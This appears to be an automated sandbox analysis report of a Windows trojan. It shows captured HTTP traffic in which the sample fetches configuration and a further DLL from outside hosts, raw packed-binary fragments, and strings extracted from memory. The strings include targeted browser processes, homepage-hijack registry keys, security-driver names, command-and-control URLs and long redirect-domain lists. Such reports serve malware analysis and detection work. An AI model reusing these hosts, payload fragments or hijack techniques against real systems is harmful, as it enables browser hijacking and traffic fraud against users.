Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 15:34:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQQRQQDB=PIKAPDGBKPOPDCEPNABCPDBB; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>..



GET /index/getcfg?id=58075 HTTP/1.1
Host: udo.jxwan.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 
Server: nginx/1.4.4
Date: Wed, 28 Jun 2017 15:28:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
1fb7..............[..6...[......N...4q;....b...o..[..|^..1....."....m.
7.lw[..H.,V=U,.......q............6.._.......?......?..SR'.x.EkU].....
....zH..J...J...L..|.._....(.?,.a.~...~......5..7..../~.{.{.......b9..
..9_..#...#....../_.....K. ...X...... .5...w..?._~%.._......._...../..
6......_.|.._..._._~..k.A..;v.......; ..3.~.W7.|......;s)......o......
......t ..gF.../......B...s.9..8.../...-....Ns...i[.5.....?..0...mik..
...b.0.....x....>k.3..*.!Yb.E.?>=.n.......@.M1W={....]g.y."yV..o
P.....?.w..K.9...X.....j..N..#.....\'....\.....t?Vy.O.....A......Mz.L.
.^N..=_...*..<Q1.a....#.V...m.V.!-.}......._.O.|.....~.>.....7..
..}........._>}..X.. .......E.V.....2..ru.K.L.Q.._....P...3P.y?OK1.
. ..e...p.......cP.Rk..VLeQ....6..#I.......X.:..D....\.<vs...e....6
.E....[d........!........x.fj...Y=..H..s.......p.,S.9........)./.....W
...P.OZ..-.....&...>E...../..(..9..8..o...o.~....'}.E..3.a.t..aF.}.
.......E?..du#s.6...n..o.}...t......{....~.........h1...o....Oq.....o.
../...O...c...H......<.z...%i....W...ZSL.A.!)..ic...e..9x.Mc....T.u
....X..Pt._:E.X...c..O..,......u.i?.......*..g...|.....i..u..!.9...Y&.
..~P=. .Yn5).3......S..j.Y....;.P%....3.....0....t..4.E..2n..^.aM.....
...C.........b..Q...)4XG.a.4....S......(.i.%.....^.8..D.....q(.E..{..z
..........x...%.8.._.M\.@EZ..r..........<.!w2 ...rZL..z$&k~..Y.B...
.....lE...<......*.............RVe.#...u........E.X.41?^.U.xi*Y`.].
&...C.t(.U<M..._\.R...}1`.2.9.@.w...h. w,U%k}.zF.t..N.K.3.....-:...
.^....].....9....ae........Il.:T....I7.,w..i......&......E........
<<< skipped >>>


GET /d2/CDClient.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 28 Jun 2017 09:47:02 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 28 Jun 2017 09:39:45 GMT
Content-Type: application/octet-stream
Content-Length: 957952
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
DUP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..............................@.................................A.....
..................................<...R.......m....................
......................................................................
.................CODE.............v......PEC2^O...... ....rsrc....0...
...."...z.............. ....reloc..............................@......
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.............................................../&..b.. .........c....X
.........b..._.....J>b.d.I.....i5.R......-.X.,So.....Wp.eAbk......7
i.....8x......j...o$.f....e.Xa...V....b.C.n...9H..TC.J-......].L .b|C.
*{?..@...a..w..Q.s...."..\...3KO.w.....V.....^.#b.l......<.q.C<.
......].6..t..E..s.oT.f0...vn.=.l.D.....6\@..Cg.B.._.I5O.......K....L.
H.i&.[....G..#. .....#...x.0. ..=...YE....e...<.?.$=HQ...:~7F.o8...
..)....8....._.c.N.n$...C. X.........6..w);V.i.....r.$...... s..F.S.b^
..O,......t.~.!..*.....j..: ....$~D~o~...rPh~....u..g....Q2&zV...@
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

b38a20ed8a675be0d249881f09a0b7a.exe_3404:

`.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFileL"C
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError|.C
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP@sC
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions<sC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBasexED
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Ínor%o|od~
UhÝ
hXXp://
Ínor%mo~ilm5cn7
http/1.1 404
2$:$:$;3
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
333333333
?456789:;<=
!"#$%&'()* ,-./0123
hu2.iua
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetCPInfo
version.dll
MsgWaitForMultipleObjects
GetProcessHeap
ntdll.dll
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
<requestedExecutionLevel level="requireAdministrator"/>
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_00170000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_00401000_00060000:

kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFileL"C
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError|.C
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP@sC
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions<sC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBasexED
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Ínor%o|od~
UhÝ
hXXp://
Ínor%mo~ilm5cn7
http/1.1 404
2$:$:$;3
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
333333333
?456789:;<=
!"#$%&'()* ,-./0123
hu2.iua
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetCPInfo
version.dll
MsgWaitForMultipleObjects
GetProcessHeap
ntdll.dll
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
<requestedExecutionLevel level="requireAdministrator"/>
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_005F0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

b38a20ed8a675be0d249881f09a0b7a.exe_3404_rwx_02AC1000_00197000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
ole32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port`
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPortP#
OnExecute
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword`
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient$
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestL
TIdHTTPProtocol`
TIdCustomHTTP
TIdCustomHTTP`
TIdHTTPH
TIdHTTP
HTTPOptions
Port0
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState$
OnKeyDownLg
OnKeyPress
OnKeyUp$f
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
AutoHotkeys@
TKeyEvent
TKeyPressEvent
HelpKeyword8u
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserAppH
IWebBrowser2|
bstrUrlContext
bstrUrl
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable
OnWindowSetLeft(
OnWindowSetTopt
OnWindowSetWidth
OnWindowSetHeight
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
PSAPI.dll
TIdUDPBase
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
TIdUDPServerD
IdUDPServer
DefaultPort
OnUDPRead
TIdUDPClient
TIdUDPClient$
IdUDPClient
Port<
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
hXXp://udo.jxwan.com/index/getcfg?id=
baidu.3v32.com
.qq.com/
VVV.fhdlq.com/top
Ínor%o|od~
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
winloader.exe
Droid4xSW.exe
MobileSimulate.exe
MONIwan.exe
AndroidEmulator.exe
UrlAD:
VVV.baidu.com/s?
Get url Err...
explorer.exe
HintSock.dll
VVV.998wan.com
sogou.com
VVV.sogou.com/index.htm?pid=
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
VVV.sun0769.com
VVV.hg6288.com
2.0.2.9
RestoreTCP
C:\Windows\sysnative\drivers\kWppProxy.sys
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
123.sogou.com/?
VVV.sogou.com
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
UDO.EXE
BarClient.exe
adsec.exe
HC\hCard\adsec.exe
BarClientView.exe
msdialg100_D.dll
\drivers\qmtgpnetflow764.sys
\system32\ntoskrnl.exe
\kavbootc64.sys
drivers\nvlddmkm.sys
\drivers\stpdrive.sys
\drivers\tesmon.sys
\snfp64.sys
xqosclientx64.sys
\drivers\360netmon.sys
b~~z0%%xonn$|;ok$ieg%>>}5dcn7
$l?m9$ieg%ss5dcn7
$l?m9$iegþf5dcn7
dwz.cn/
VVV.ra2ol.com/client
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].com*
*s8s[0-9][0-9].com*
*s8s[0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].me*
*s8s[0-9][0-9].me*
*s8s[0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].me*
js[0-9][0-9][0-9][0-9][0-9][0-9].com
js[0-9][0-9][0-9][0-9][0-9].com
pj[0-9][0-9][0-9][0-9][0-9][0-9].com
pj[0-9][0-9][0-9][0-9][0-9].com
vnsr[0-9][0-9][0-9][0-9][0-9].com
vnsr[0-9][0-9][0-9][0-9].com
vnsr[0-9][0-9][0-9].com
vns[0-9][0-9][0-9][0-9][0-9].com
vns[0-9][0-9][0-9][0-9].com
vns[0-9][0-9][0-9].com
VVV.baidu.com/favicon.ico
VVV.hao123.com/favicon.ico
VVV.gzmxol.com/dhh_launcher/
.com/favicon.ico
link?url=
üda%
mp.32dp.cn
ok.x5wb.com
index.2345wb.com
mk.5hpp.com
hao.k6kb.xyz
VVV.2345mini.com
hao.91wanyx.lol
wb.91wanyx.lol
VVV.wb988.com
hlybar.com
ie.17kanyx.cc
xqj-net.com
5500w.com
mk.vee9.com
VVV.58wangwei.com
hao.webnav.top
iehome.ssoor.com
gmrb.com.cn
VVV.hao522.com
hao522.com
icafedh.com
baibu.com
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
cdc.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
sogoulp.com
dh.c37.cc
hao.5in8.com
VVV.5334.com
/t.cn/
123.k6kb.xyz
.91wanyx.lol
VVV.hlybar.com
.114wb.net
wbsite2016.net
.hao522.com
VVV.icafedh.com
.hao2016.net
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
cn.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
index.woai310.com
VVV.sogou58.com
VVV.tao123.com
huo99.com
VVV.2345.com/?
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
